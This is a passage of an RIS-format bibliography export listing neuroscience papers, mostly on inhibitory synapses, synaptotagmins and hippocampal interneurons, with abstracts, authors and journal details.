facilitation sensor, contribute to the depressed inhibitory synaptic transmission needs to be further investigated and understood. Our results indicated that at the BC–PC synapse, Syt7 contributes to asynchronous release, pool replenishment and facilitation. In combination, these three effects ensure efficient transmitter release during high‑frequency activity and guarantee frequency independence of inhibition. Taken together, our results confirmed that Syt2, which has the fastest kinetic properties among all synaptotagmin members, is mainly used by the inhibitory BC‑PC synapse for synaptic transmission, contributing to the speed and temporal precision of transmitter release. Furthermore, we showed that Syt7, another highly expressed synaptotagmin member in the output synapses of cerebellar BCs, is used for ensuring efficient inhibitor synaptic transmission during high activity. AU - Chen, Chong ID - 324 TI - Synaptotagmins ensure speed and efficiency of inhibitory neurotransmitter release ER - TY - JOUR AB - Parvalbumin-positive (PV+) GABAergic interneurons in hippocampal microcircuits are thought to play a key role in several higher network functions, such as feedforward and feedback inhibition, network oscillations, and pattern separation. Fast lateral inhibition mediated by GABAergic interneurons may implement a winner-takes-all mechanism in the hippocampal input layer. However, it is not clear whether the functional connectivity rules of granule cells (GCs) and interneurons in the dentate gyrus are consistent with such a mechanism. Using simultaneous patch-clamp recordings from up to seven GCs and up to four PV+ interneurons in the dentate gyrus, we find that connectivity is structured in space, synapse-specific, and enriched in specific disynaptic motifs. In contrast to the neocortex, lateral inhibition in the dentate gyrus (in which a GC inhibits neighboring GCs via a PV+ interneuron) is ~ 10-times more abundant than recurrent inhibition (in which a GC inhibits itself). Thus, unique connectivity rules may enable the dentate gyrus to perform specific higher-order computations AU - Espinoza Martinez, Claudia M AU - Guzmán, José AU - Zhang, Xiaomin AU - Jonas, Peter M ID - 21 IS - 1 JF - Nature Communications TI - Parvalbumin+ interneurons obey unique connectivity rules and establish a powerful lateral-inhibition microcircuit in dentate gyrus VL - 9 ER - TY - JOUR AB - Gamma oscillations (30–150 Hz) in neuronal networks are associated with the processing and recall of information. We measured local field potentials in the dentate gyrus of freely moving mice and found that gamma activity occurs in bursts, which are highly heterogeneous in their spatial extensions, ranging from focal to global coherent events. Synaptic communication among perisomatic-inhibitory interneurons (PIIs) is thought to play an important role in the generation of hippocampal gamma patterns. However, how neuronal circuits can generate synchronous oscillations at different spatial scales is unknown. We analyzed paired recordings in dentate gyrus slices and show that synaptic signaling at interneuron-interneuron synapses is distance dependent. Synaptic strength declines whereas the duration of inhibitory signals increases with axonal distance among interconnected PIIs. Using neuronal network modeling, we show that distance-dependent inhibition generates multiple highly synchronous focal gamma bursts allowing the network to process complex inputs in parallel in flexibly organized neuronal centers. AU - Strüber, Michael AU - Sauer, Jonas AU - Jonas, Peter M AU - Bartos, Marlene ID - 800 IS - 1 JF - Nature Communications SN - 20411723 TI - Distance-dependent inhibition facilitates focality of gamma oscillations in the dentate gyrus VL - 8 ER - TY - JOUR AB - Synaptotagmin 7 (Syt7) is thought to be a Ca2+ sensor that mediates asynchronous transmitter release and facilitation at synapses. However, Syt7 is strongly expressed in fast-spiking, parvalbumin-expressing GABAergic interneurons, and the output synapses of these neurons produce only minimal asynchronous release and show depression rather than facilitation. To resolve this apparent contradiction, we examined the effects of genetic elimination of Syt7 on synaptic transmission at the GABAergic basket cell (BC)-Purkinje cell (PC) synapse in cerebellum. Our results indicate that at the BC-PC synapse, Syt7 contributes to asynchronous release, pool replenishment, and facilitation. In combination, these three effects ensure efficient transmitter release during high-frequency activity and guarantee frequency independence of inhibition. Our results identify a distinct function of Syt7: ensuring the efficiency of high-frequency inhibitory synaptic transmission AU - Chen, Chong AU - Satterfield, Rachel AU - Young, Samuel AU - Jonas, Peter M ID - 749 IS - 8 JF - Cell Reports SN - 22111247 TI - Triple function of Synaptotagmin 7 ensures efficiency of high-frequency transmission at central GABAergic synapses VL - 21 ER - TY - CONF AB - Background: Standards have become available to share semantically encoded vital parameters from medical devices, as required for example by personal healthcare records. Standardised sharing of biosignal data largely remains open. Objectives: The goal of this work is to explore available biosignal file format and data exchange standards and profiles, and to conceptualise end-To-end solutions. Methods: The authors reviewed and discussed available biosignal file format standards with other members of international standards development organisations (SDOs). Results: A raw concept for standards based acquisition, storage, archiving and sharing of biosignals was developed. The GDF format may serve for storing biosignals. Signals can then be shared using FHIR resources and may be stored on FHIR servers or in DICOM archives, with DICOM waveforms as one possible format. Conclusion: Currently a group of international SDOs (e.g. HL7, IHE, DICOM, IEEE) is engaged in intensive discussions. This discussion extends existing work that already was adopted by large implementer communities. The concept presented here only reports the current status of the discussion in Austria. The discussion will continue internationally, with results to be expected over the coming years. AU - Sauermann, Stefan AU - David, Veronika AU - Schlögl, Alois AU - Egelkraut, Reinhard AU - Frohner, Matthias AU - Pohn, Birgit AU - Urbauer, Philipp AU - Mense, Alexander ID - 630 SN - 978-161499758-0 TI - Biosignals standards and FHIR: The way to go VL - 236 ER - TY - JOUR AB - A hippocampal mossy fiber synapse has a complex structure and is implicated in learning and memory. In this synapse, the mossy fiber boutons attach to the dendritic shaft by puncta adherentia junctions and wrap around a multiply-branched spine, forming synaptic junctions. We have recently shown using transmission electron microscopy, immunoelectron microscopy and serial block face-scanning electron microscopy that atypical puncta adherentia junctions are formed in the afadin-deficient mossy fiber synapse and that the complexity of postsynaptic spines and mossy fiber boutons, the number of spine heads, the area of postsynaptic densities and the density of synaptic vesicles docked to active zones are decreased in the afadin-deficient synapse. We investigated here the roles of afadin in the functional differentiations of the mossy fiber synapse using the afadin-deficient mice. The electrophysiological studies showed that both the release probability of glutamate and the postsynaptic responsiveness to glutamate were markedly reduced, but not completely lost, in the afadin-deficient mossy fiber synapse, whereas neither long-term potentiation nor long-term depression was affected. These results indicate that afadin plays roles in the functional differentiations of the presynapse and the postsynapse of the hippocampal mossy fiber synapse. AU - Geng, Xiaoqi AU - Maruo, Tomohiko AU - Mandai, Kenji AU - Supriyanto, Irwan AU - Miyata, Muneaki AU - Sakakibara, Shotaro AU - Mizoguchi, Akira AU - Takai, Yoshimi AU - Mori, Masahiro ID - 706 IS - 8 JF - Genes to Cells SN - 13569597 TI - Roles of afadin in functional differentiations of hippocampal mossy fiber synapse VL - 22 ER - TY - JOUR AB - GABAergic synapses in brain circuits generate inhibitory output signals with submillisecond latency and temporal precision. Whether the molecular identity of the release sensor contributes to these signaling properties remains unclear. Here, we examined the Ca^2+ sensor of exocytosis at GABAergic basket cell (BC) to Purkinje cell (PC) synapses in cerebellum. Immunolabeling suggested that BC terminals selectively expressed synaptotagmin 2 (Syt2), whereas synaptotagmin 1 (Syt1) was enriched in excitatory terminals. Genetic elimination of Syt2 reduced action potential-evoked release to ∼10%, identifying Syt2 as the major Ca^2+ sensor at BC-PC synapses. Differential adenovirus-mediated rescue revealed that Syt2 triggered release with shorter latency and higher temporal precision and mediated faster vesicle pool replenishment than Syt1. Furthermore, deletion of Syt2 severely reduced and delayed disynaptic inhibition following parallel fiber stimulation. Thus, the selective use of Syt2 as release sensor at BC-PC synapses ensures fast and efficient feedforward inhibition in cerebellar microcircuits. #bioimagingfacility-author AU - Chen, Chong AU - Arai, Itaru AU - Satterield, Rachel AU - Young, Samuel AU - Jonas, Peter M ID - 1117 IS - 3 JF - Cell Reports SN - 22111247 TI - Synaptotagmin 2 is the fast Ca2+ sensor at a central inhibitory synapse VL - 18 ER - TY - JOUR AB - Sharp wave-ripple (SWR) oscillations play a key role in memory consolidation during non-rapid eye movement sleep, immobility, and consummatory behavior. However, whether temporally modulated synaptic excitation or inhibition underlies the ripples is controversial. To address this question, we performed simultaneous recordings of excitatory and inhibitory postsynaptic currents (EPSCs and IPSCs) and local field potentials (LFPs) in the CA1 region of awake mice in vivo. During SWRs, inhibition dominated over excitation, with a peak conductance ratio of 4.1 ± 0.5. Furthermore, the amplitude of SWR-associated IPSCs was positively correlated with SWR magnitude, whereas that of EPSCs was not. Finally, phase analysis indicated that IPSCs were phase-locked to individual ripple cycles, whereas EPSCs were uniformly distributed in phase space. Optogenetic inhibition indicated that PV+ interneurons provided a major contribution to SWR-associated IPSCs. Thus, phasic inhibition, but not excitation, shapes SWR oscillations in the hippocampal CA1 region in vivo. AU - Gan, Jian AU - Weng, Shih-Ming AU - Pernia-Andrade, Alejandro AU - Csicsvari, Jozsef L AU - Jonas, Peter M ID - 1118 IS - 2 JF - Neuron TI - Phase-locked inhibition, but not excitation, underlies hippocampal ripple oscillations in awake mice in vivo VL - 93 ER - TY - JOUR AB - Synaptotagmin 7 (Syt7) was originally identified as a slow Ca2+ sensor for lysosome fusion, but its function at fast synapses is controversial. The paper by Luo and Südhof (2017) in this issue of Neuron shows that at the calyx of Held in the auditory brainstem Syt7 triggers asynchronous release during stimulus trains, resulting in reliable and temporally precise high-frequency transmission. Thus, a slow Ca2+ sensor contributes to the fast signaling properties of the calyx synapse. AU - Chen, Chong AU - Jonas, Peter M ID - 991 IS - 4 JF - Neuron SN - 08966273 TI - Synaptotagmins: That’s why so many VL - 94 ER - TY - JOUR AB - Mossy fiber synapses on CA3 pyramidal cells are 'conditional detonators' that reliably discharge postsynaptic targets. The 'conditional' nature implies that burst activity in dentate gyrus granule cells is required for detonation. Whether single unitary excitatory postsynaptic potentials (EPSPs) trigger spikes in CA3 neurons remains unknown. Mossy fiber synapses exhibit both pronounced short-term facilitation and uniquely large post-tetanic potentiation (PTP). We tested whether PTP could convert mossy fiber synapses from subdetonator into detonator mode, using a recently developed method to selectively and noninvasively stimulate individual presynaptic terminals in rat brain slices. Unitary EPSPs failed to initiate a spike in CA3 neurons under control conditions, but reliably discharged them after induction of presynaptic short-term plasticity. Remarkably, PTP switched mossy fiber synapses into full detonators for tens of seconds. Plasticity-dependent detonation may be critical for efficient coding, storage, and recall of information in the granule cell–CA3 cell network. AU - Vyleta, Nicholas AU - Borges Merjane, Carolina AU - Jonas, Peter M ID - 1323 JF - eLife TI - Plasticity-dependent, full detonation at hippocampal mossy fiber–CA3 pyramidal neuron synapses VL - 5 ER - TY - JOUR AB - The hippocampal CA3 region plays a key role in learning and memory. Recurrent CA3–CA3 synapses are thought to be the subcellular substrate of pattern completion. However, the synaptic mechanisms of this network computation remain enigmatic. To investigate these mechanisms, we combined functional connectivity analysis with network modeling. Simultaneous recording fromup to eight CA3 pyramidal neurons revealed that connectivity was sparse, spatially uniform, and highly enriched in disynaptic motifs (reciprocal, convergence,divergence, and chain motifs). Unitary connections were composed of one or two synaptic contacts, suggesting efficient use of postsynaptic space. Real-size modeling indicated that CA3 networks with sparse connectivity, disynaptic motifs, and single-contact connections robustly generated pattern completion.Thus, macro- and microconnectivity contribute to efficient memory storage and retrieval in hippocampal networks. AU - Guzmán, José AU - Schlögl, Alois AU - Frotscher, Michael AU - Jonas, Peter M ID - 1350 IS - 6304 JF - Science TI - Synaptic mechanisms of pattern completion in the hippocampal CA3 network VL - 353 ER - TY - JOUR AB - ATP released from neurons and astrocytes during neuronal activity or under pathophysiological circumstances is able to influence information flow in neuronal circuits by activation of ionotropic P2X and metabotropic P2Y receptors and subsequent modulation of cellular excitability, synaptic strength, and plasticity. In the present paper we review cellular and network effects of P2Y receptors in the brain. We show that P2Y receptors inhibit the release of neurotransmitters, modulate voltage- and ligand-gated ion channels, and differentially influence the induction of synaptic plasticity in the prefrontal cortex, hippocampus, and cerebellum. The findings discussed here may explain how P2Y1 receptor activation during brain injury, hypoxia, inflammation, schizophrenia, or Alzheimer's disease leads to an impairment of cognitive processes. Hence, it is suggested that the blockade of P2Y1 receptors may have therapeutic potential against cognitive disturbances in these states. AU - Guzmán, José AU - Gerevich, Zoltan ID - 1435 JF - Neural Plasticity TI - P2Y receptors in synaptic transmission and plasticity: Therapeutic potential in cognitive dysfunction VL - 2016 ER - TY - JOUR AB - The hippocampus plays a key role in learning and memory. Previous studies suggested that the main types of principal neurons, dentate gyrus granule cells (GCs), CA3 pyramidal neurons, and CA1 pyramidal neurons, differ in their activity pattern, with sparse firing in GCs and more frequent firing in CA3 and CA1 pyramidal neurons. It has been assumed but never shown that such different activity may be caused by differential synaptic excitation. To test this hypothesis, we performed high-resolution whole-cell patch-clamp recordings in anesthetized rats in vivo. In contrast to previous in vitro data, both CA3 and CA1 pyramidal neurons fired action potentials spontaneously, with a frequency of ∼3–6 Hz, whereas GCs were silent. Furthermore, both CA3 and CA1 cells primarily fired in bursts. To determine the underlying mechanisms, we quantitatively assessed the frequency of spontaneous excitatory synaptic input, the passive membrane properties, and the active membrane characteristics. Surprisingly, GCs showed comparable synaptic excitation to CA3 and CA1 cells and the highest ratio of excitation versus hyperpolarizing inhibition. Thus, differential synaptic excitation is not responsible for differences in firing. Moreover, the three types of hippocampal neurons markedly differed in their passive properties. While GCs showed the most negative membrane potential, CA3 pyramidal neurons had the highest input resistance and the slowest membrane time constant. The three types of neurons also differed in the active membrane characteristics. GCs showed the highest action potential threshold, but displayed the largest gain of the input-output curves. In conclusion, our results reveal that differential firing of the three main types of hippocampal principal neurons in vivo is not primarily caused by differences in the characteristics of the synaptic input, but by the distinct properties of synaptic integration and input-output transformation. AU - Kowalski, Janina AU - Gan, Jian AU - Jonas, Peter M AU - Pernia-Andrade, Alejandro ID - 1616 IS - 5 JF - Hippocampus TI - Intrinsic membrane properties determine hippocampal differential firing pattern in vivo in anesthetized rats VL - 26 ER - TY - JOUR AB - Hemolysis drives susceptibility to bacterial infections and predicts poor outcome from sepsis. These detrimental effects are commonly considered to be a consequence of heme-iron serving as a nutrient for bacteria. We employed a Gram-negative sepsis model and found that elevated heme levels impaired the control of bacterial proliferation independently of heme-iron acquisition by pathogens. Heme strongly inhibited phagocytosis and the migration of human and mouse phagocytes by disrupting actin cytoskeletal dynamics via activation of the GTP-binding Rho family protein Cdc42 by the guanine nucleotide exchange factor DOCK8. A chemical screening approach revealed that quinine effectively prevented heme effects on the cytoskeleton, restored phagocytosis and improved survival in sepsis. These mechanistic insights provide potential therapeutic targets for patients with sepsis or hemolytic disorders. AU - Martins, Rui AU - Maier, Julia AU - Gorki, Anna AU - Huber, Kilian AU - Sharif, Omar AU - Starkl, Philipp AU - Saluzzo, Simona AU - Quattrone, Federica AU - Gawish, Riem AU - Lakovits, Karin AU - Aichinger, Michael AU - Radic Sarikas, Branka AU - Lardeau, Charles AU - Hladik, Anastasiya AU - Korosec, Ana AU - Brown, Markus AU - Vaahtomeri, Kari AU - Duggan, Michelle AU - Kerjaschki, Dontscho AU - Esterbauer, Harald AU - Colinge, Jacques AU - Eisenbarth, Stephanie AU - Decker, Thomas AU - Bennett, Keiryn AU - Kubicek, Stefan AU - Sixt, Michael K AU - Superti Furga, Giulio AU - Knapp, Sylvia ID - 1142 IS - 12 JF - Nature Immunology TI - Heme drives hemolysis-induced susceptibility to infection via disruption of phagocyte functions VL - 17 ER - TY - JOUR AB - CA3–CA3 recurrent excitatory synapses are thought to play a key role in memory storage and pattern completion. Whether the plasticity properties of these synapses are consistent with their proposed network functions remains unclear. Here, we examine the properties of spike timing-dependent plasticity (STDP) at CA3–CA3 synapses. Low-frequency pairing of excitatory postsynaptic potentials (EPSPs) and action potentials (APs) induces long-term potentiation (LTP), independent of temporal order. The STDP curve is symmetric and broad (half-width ~150 ms). Consistent with these STDP induction properties, AP–EPSP sequences lead to supralinear summation of spine [Ca2+] transients. Furthermore, afterdepolarizations (ADPs) following APs efficiently propagate into dendrites of CA3 pyramidal neurons, and EPSPs summate with dendritic ADPs. In autoassociative network models, storage and recall are more robust with symmetric than with asymmetric STDP rules. Thus, a specialized STDP induction rule allows reliable storage and recall of information in the hippocampal CA3 network. AU - Mishra, Rajiv Kumar AU - Kim, Sooyun AU - Guzmán, José AU - Jonas, Peter M ID - 1432 JF - Nature Communications TI - Symmetric spike timing-dependent plasticity at CA3–CA3 synapses optimizes storage and recall in autoassociative networks VL - 7 ER - TY - THES AB - CA3 pyramidal neurons are thought to pay a key role in memory storage and pattern completion by activity-dependent synaptic plasticity between CA3-CA3 recurrent excitatory synapses. To examine the induction rules of synaptic plasticity at CA3-CA3 synapses, we performed whole-cell patch-clamp recordings in acute hippocampal slices from rats (postnatal 21-24 days) at room temperature. Compound excitatory postsynaptic potentials (ESPSs) were recorded by tract stimulation in stratum oriens in the presence of 10 µM gabazine. High-frequency stimulation (HFS) induced N-methyl-D-aspartate (NMDA) receptor-dependent long-term potentiation (LTP). Although LTP by HFS did not requier postsynaptic spikes, it was blocked by Na+-channel blockers suggesting that local active processes (e.g.) dendritic spikes) may contribute to LTP induction without requirement of a somatic action potential (AP). We next examined the properties of spike timing-dependent plasticity (STDP) at CA3-CA3 synapses. Unexpectedly, low-frequency pairing of EPSPs and backpropagated action potentialy (bAPs) induced LTP, independent of temporal order. The STDP curve was symmetric and broad, with a half-width of ~150 ms. Consistent with these specific STDP induction properties, post-presynaptic sequences led to a supralinear summation of spine [Ca2+] transients. Furthermore, in autoassociative network models, storage and recall was substantially more robust with symmetric than with asymmetric STDP rules. In conclusion, we found associative forms of LTP at CA3-CA3 recurrent collateral synapses with distinct induction rules. LTP induced by HFS may be associated with dendritic spikes. In contrast, low frequency pairing of pre- and postsynaptic activity induced LTP only if EPSP-AP were temporally very close. Together, these induction mechanisms of synaptiic plasticity may contribute to memory storage in the CA3-CA3 microcircuit at different ranges of activity. AU - Mishra, Rajiv Kumar ID - 1396 TI - Synaptic plasticity rules at CA3-CA3 recurrent synapses in hippocampus ER - TY - JOUR AB - Huge body of evidences demonstrated that volatile anesthetics affect the hippocampal neurogenesis and neurocognitive functions, and most of them showed impairment at anesthetic dose. Here, we investigated the effect of low dose (1.8%) sevoflurane on hippocampal neurogenesis and dentate gyrus-dependent learning. Neonatal rats at postnatal day 4 to 6 (P4-6) were treated with 1.8% sevoflurane for 6 hours. Neurogenesis was quantified by bromodeoxyuridine labeling and electrophysiology recording. Four and seven weeks after treatment, the Morris water maze and contextual-fear discrimination learning tests were performed to determine the influence on spatial learning and pattern separation. A 6-hour treatment with 1.8% sevoflurane promoted hippocampal neurogenesis and increased the survival of newborn cells and the proportion of immature granular cells in the dentate gyrus of neonatal rats. Sevoflurane-treated rats performed better during the training days of the Morris water maze test and in contextual-fear discrimination learning test. These results suggest that a subanesthetic dose of sevoflurane promotes hippocampal neurogenesis in neonatal rats and facilitates their performance in dentate gyrus-dependent learning tasks. AU - Chen, Chong AU - Wang, Chao AU - Zhao, Xuan AU - Zhou, Tao AU - Xu, Dao AU - Wang, Zhi AU - Wang, Ying ID - 1834 IS - 2 JF - ASN Neuro TI - Low-dose sevoflurane promoteshippocampal neurogenesis and facilitates the development of dentate gyrus-dependent learning in neonatal rats VL - 7 ER - TY - JOUR AB - Based on extrapolation from excitatory synapses, it is often assumed that depletion of the releasable pool of synaptic vesicles is the main factor underlying depression at inhibitory synapses. In this issue of Neuron, using subcellular patch-clamp recording from inhibitory presynaptic terminals, Kawaguchi and Sakaba (2015) show that at Purkinje cell-deep cerebellar nuclei neuron synapses, changes in presynaptic action potential waveform substantially contribute to synaptic depression. Based on extrapolation from excitatory synapses, it is often assumed that depletion of the releasable pool of synaptic vesicles is the main factor underlying depression at inhibitory synapses. In this issue of Neuron, using subcellular patch-clamp recording from inhibitory presynaptic terminals, Kawaguchi and Sakaba (2015) show that at Purkinje cell-deep cerebellar nuclei neuron synapses, changes in presynaptic action potential waveform substantially contribute to synaptic depression. AU - Vandael, David H AU - Espinoza Martinez, Claudia M AU - Jonas, Peter M ID - 1845 IS - 6 JF - Neuron TI - Excitement about inhibitory presynaptic terminals VL - 85 ER - TY - JOUR AB - Neuronal and neuroendocrine L-type calcium channels (Cav1.2, Cav1.3) open readily at relatively low membrane potentials and allow Ca2+ to enter the cells near resting potentials. In this way, Cav1.2 and Cav1.3 shape the action potential waveform, contribute to gene expression, synaptic plasticity, neuronal differentiation, hormone secretion and pacemaker activity. In the chromaffin cells (CCs) of the adrenal medulla, Cav1.3 is highly expressed and is shown to support most of the pacemaking current that sustains action potential (AP) firings and part of the catecholamine secretion. Cav1.3 forms Ca2+-nanodomains with the fast inactivating BK channels and drives the resting SK currents. These latter set the inter-spike interval duration between consecutive spikes during spontaneous firing and the rate of spike adaptation during sustained depolarizations. Cav1.3 plays also a primary role in the switch from “tonic” to “burst” firing that occurs in mouse CCs when either the availability of voltage-gated Na channels (Nav) is reduced or the β2 subunit featuring the fast inactivating BK channels is deleted. Here, we discuss the functional role of these “neuronlike” firing modes in CCs and how Cav1.3 contributes to them. The open issue is to understand how these novel firing patterns are adapted to regulate the quantity of circulating catecholamines during resting condition or in response to acute and chronic stress. AU - Vandael, David H AU - Marcantoni, Andrea AU - Carbone, Emilio ID - 1535 IS - 2 JF - Current Molecular Pharmacology TI - Cav1.3 channels as key regulators of neuron-like firings and catecholamine release in chromaffin cells VL - 8 ER - TY - JOUR AB - Leptin is an adipokine produced by the adipose tissue regulating body weight through its appetite-suppressing effect. Besides being expressed in the hypothalamus and hippocampus, leptin receptors (ObRs) are also present in chromaffin cells of the adrenal medulla. In the present study, we report the effect of leptin on mouse chromaffin cell (MCC) functionality, focusing on cell excitability and catecholamine secretion. Acute application of leptin (1 nm) on spontaneously firing MCCs caused a slowly developing membrane hyperpolarization followed by complete blockade of action potential (AP) firing. This inhibitory effect at rest was abolished by the BK channel blocker paxilline (1 μm), suggesting the involvement of BK potassium channels. Single-channel recordings in 'perforated microvesicles' confirmed that leptin increased BK channel open probability without altering its unitary conductance. BK channel up-regulation was associated with the phosphoinositide 3-kinase (PI3K) signalling cascade because the PI3K specific inhibitor wortmannin (100 nm) fully prevented BK current increase. We also tested the effect of leptin on evoked AP firing and Ca2+-driven exocytosis. Although leptin preserves well-adapted AP trains of lower frequency, APs are broader and depolarization-evoked exocytosis is increased as a result of the larger size of the ready-releasable pool and higher frequency of vesicle release. The kinetics and quantal size of single secretory events remained unaltered. Leptin had no effect on firing and secretion in db-/db- mice lacking the ObR gene, confirming its specificity. In conclusion, leptin exhibits a dual action on MCC activity. It dampens AP firing at rest but preserves AP firing and increases catecholamine secretion during sustained stimulation, highlighting the importance of the adipo-adrenal axis in the leptin-mediated increase of sympathetic tone and catecholamine release. AU - Gavello, Daniela AU - Vandael, David H AU - Gosso, Sara AU - Carbone, Emilio AU - Carabelli, Valentina ID - 1565 IS - 22 JF - Journal of Physiology TI - Dual action of leptin on rest-firing and stimulated catecholamine release via phosphoinositide 3-kinase-riven BK channel up-regulation in mouse chromaffin cells VL - 593 ER - TY - JOUR AB - Synapsins (Syns) are an evolutionarily conserved family of presynaptic proteins crucial for the fine-tuning of synaptic function. A large amount of experimental evidences has shown that Syns are involved in the development of epileptic phenotypes and several mutations in Syn genes have been associated with epilepsy in humans and animal models. Syn mutations induce alterations in circuitry and neurotransmitter release, differentially affecting excitatory and inhibitory synapses, thus causing an excitation/inhibition imbalance in network excitability toward hyperexcitability that may be a determinant with regard to the development of epilepsy. Another approach to investigate epileptogenic mechanisms is to understand how silencing Syn affects the cellular behavior of single neurons and is associated with the hyperexcitable phenotypes observed in epilepsy. Here, we examined the functional effects of antisense-RNA inhibition of Syn expression on individually identified and isolated serotonergic cells of the Helix land snail. We found that Helix synapsin silencing increases cell excitability characterized by a slightly depolarized resting membrane potential, decreases the rheobase, reduces the threshold for action potential (AP) firing and increases the mean and instantaneous firing rates, with respect to control cells. The observed increase of Ca2+ and BK currents in Syn-silenced cells seems to be related to changes in the shape of the AP waveform. These currents sustain the faster spiking in Syn-deficient cells by increasing the after hyperpolarization and limiting the Na+ and Ca2+ channel inactivation during repetitive firing. This in turn speeds up the depolarization phase by reaching the AP threshold faster. Our results provide evidence that Syn silencing increases intrinsic cell excitability associated with increased Ca2+ and Ca2+-dependent BK currents in the absence of excitatory or inhibitory inputs. AU - Brenes, Oscar AU - Vandael, David H AU - Carbone, Emilio AU - Montarolo, Pier AU - Ghirardi, Mirella ID - 1580 JF - Neuroscience TI - Knock-down of synapsin alters cell excitability and action potential waveform by potentiating BK and voltage gated Ca2 currents in Helix serotonergic neurons VL - 311 ER - TY - JOUR AB - GABAergic perisoma-inhibiting fast-spiking interneurons (PIIs) effectively control the activity of large neuron populations by their wide axonal arborizations. It is generally assumed that the output of one PII to its target cells is strong and rapid. Here, we show that, unexpectedly, both strength and time course of PII-mediated perisomatic inhibition change with distance between synaptically connected partners in the rodent hippocampus. Synaptic signals become weaker due to lower contact numbers and decay more slowly with distance, very likely resulting from changes in GABAA receptor subunit composition. When distance-dependent synaptic inhibition is introduced to a rhythmically active neuronal network model, randomly driven principal cell assemblies are strongly synchronized by the PIIs, leading to higher precision in principal cell spike times than in a network with uniform synaptic inhibition. AU - Strüber, Michael AU - Jonas, Peter M AU - Bartos, Marlene ID - 1614 IS - 4 JF - PNAS TI - Strength and duration of perisomatic GABAergic inhibition depend on distance between synaptically connected cells VL - 112 ER - TY - JOUR AB - Loss-of-function mutations in the synaptic adhesion protein Neuroligin-4 are among the most common genetic abnormalities associated with autism spectrum disorders, but little is known about the function of Neuroligin-4 and the consequences of its loss. We assessed synaptic and network characteristics in Neuroligin-4 knockout mice, focusing on the hippocampus as a model brain region with a critical role in cognition and memory, and found that Neuroligin-4 deletion causes subtle defects of the protein composition and function of GABAergic synapses in the hippocampal CA3 region. Interestingly, these subtle synaptic changes are accompanied by pronounced perturbations of γ-oscillatory network activity, which has been implicated in cognitive function and is altered in multiple psychiatric and neurodevelopmental disorders. Our data provide important insights into the mechanisms by which Neuroligin-4-dependent GABAergic synapses may contribute to autism phenotypes and indicate new strategies for therapeutic approaches. AU - Hammer, Matthieu AU - Krueger Burg, Dilja AU - Tuffy, Liam AU - Cooper, Benjamin AU - Taschenberger, Holger AU - Goswami, Sarit AU - Ehrenreich, Hannelore AU - Jonas, Peter M AU - Varoqueaux, Frederique AU - Rhee, Jeong AU - Brose, Nils ID - 1615 IS - 3 JF - Cell Reports TI - Perturbed hippocampal synaptic inhibition and γ-oscillations in a neuroligin-4 knockout mouse model of autism VL - 13 ER - TY - JOUR AB - GABAergic inhibitory interneurons control fundamental aspects of neuronal network function. Their functional roles are assumed to be defined by the identity of their input synapses, the architecture of their dendritic tree, the passive and active membrane properties and finally the nature of their postsynaptic targets. Indeed, interneurons display a high degree of morphological and physiological heterogeneity. However, whether their morphological and physiological characteristics are correlated and whether interneuron diversity can be described by a continuum of GABAergic cell types or by distinct classes has remained unclear. Here we perform a detailed morphological and physiological characterization of GABAergic cells in the dentate gyrus, the input region of the hippocampus. To achieve an unbiased and efficient sampling and classification we used knock-in mice expressing the enhanced green fluorescent protein (eGFP) in glutamate decarboxylase 67 (GAD67)-positive neurons and performed cluster analysis. We identified five interneuron classes, each of them characterized by a distinct set of anatomical and physiological parameters. Cross-correlation analysis further revealed a direct relation between morphological and physiological properties indicating that dentate gyrus interneurons fall into functionally distinct classes which may differentially control neuronal network activity. AU - Hosp, Jonas AU - Strüber, Michael AU - Yanagawa, Yuchio AU - Obata, Kunihiko AU - Vida, Imre AU - Jonas, Peter M AU - Bartos, Marlene ID - 2285 IS - 2 JF - Hippocampus TI - Morpho-physiological criteria divide dentate gyrus interneurons into classes VL - 23 ER - TY - JOUR AB - To search for a target in a complex environment is an everyday behavior that ends with finding the target. When we search for two identical targets, however, we must continue the search after finding the first target and memorize its location. We used fixation-related potentials to investigate the neural correlates of different stages of the search, that is, before and after finding the first target. Having found the first target influenced subsequent distractor processing. Compared to distractor fixations before the first target fixation, a negative shift was observed for three subsequent distractor fixations. These results suggest that processing a target in continued search modulates the brain's response, either transiently by reflecting temporary working memory processes or permanently by reflecting working memory retention. AU - Körner, Christof AU - Braunstein, Verena AU - Stangl, Matthias AU - Schlögl, Alois AU - Neuper, Christa AU - Ischebeck, Anja ID - 1890 IS - 4 JF - Psychophysiology TI - Sequential effects in continued visual search: Using fixation-related potentials to compare distractor processing before and after target detection VL - 51 ER - TY - JOUR AB - Oriens-lacunosum moleculare (O-LM) interneurons in the CA1 region of the hippocampus play a key role in feedback inhibition and in the control of network activity. However, how these cells are efficiently activated in the network remains unclear. To address this question, I performed recordings from CA1 pyramidal neuron axons, the presynaptic fibers that provide feedback innervation of these interneurons. Two forms of axonal action potential (AP) modulation were identified. First, repetitive stimulation resulted in activity-dependent AP broadening. Broadening showed fast onset, with marked changes in AP shape following a single AP. Second, tonic depolarization in CA1 pyramidal neuron somata induced AP broadening in the axon, and depolarization-induced broadening summated with activity-dependent broadening. Outsideout patch recordings from CA1 pyramidal neuron axons revealed a high density of a-dendrotoxin (α-DTX)-sensitive, inactivating K+ channels, suggesting that K+ channel inactivation mechanistically contributes to AP broadening. To examine the functional consequences of axonal AP modulation for synaptic transmission, I performed paired recordings between synaptically connected CA1 pyramidal neurons and O-LM interneurons. CA1 pyramidal neuron-O-LM interneuron excitatory postsynaptic currents (EPSCs) showed facilitation during both repetitive stimulation and tonic depolarization of the presynaptic neuron. Both effects were mimicked and occluded by α-DTX, suggesting that they were mediated by K+ channel inactivation. Therefore, axonal AP modulation can greatly facilitate the activation of O-LM interneurons. In conclusion, modulation of AP shape in CA1 pyramidal neuron axons substantially enhances the efficacy of principal neuron-interneuron synapses, promoting the activation of O-LM interneurons in recurrent inhibitory microcircuits. AU - Kim, Sooyun ID - 2002 IS - 11 JF - PLoS One TI - Action potential modulation in CA1 pyramidal neuron axons facilitates OLM interneuron activation in recurrent inhibitory microcircuits of rat hippocampus VL - 9 ER - TY - JOUR AB - A puzzling property of synaptic transmission, originally established at the neuromuscular junction, is that the time course of transmitter release is independent of the extracellular Ca2+ concentration ([Ca2+]o), whereas the rate of release is highly [Ca2+]o-dependent. Here, we examine the time course of release at inhibitory basket cell-Purkinje cell synapses and show that it is independent of [Ca2+]o. Modeling of Ca2+-dependent transmitter release suggests that the invariant time course of release critically depends on tight coupling between Ca2+ channels and release sensors. Experiments with exogenous Ca2+ chelators reveal that channel-sensor coupling at basket cell-Purkinje cell synapses is very tight, with a mean distance of 10–20 nm. Thus, tight channel-sensor coupling provides a mechanistic explanation for the apparent [Ca2+]o independence of the time course of release. 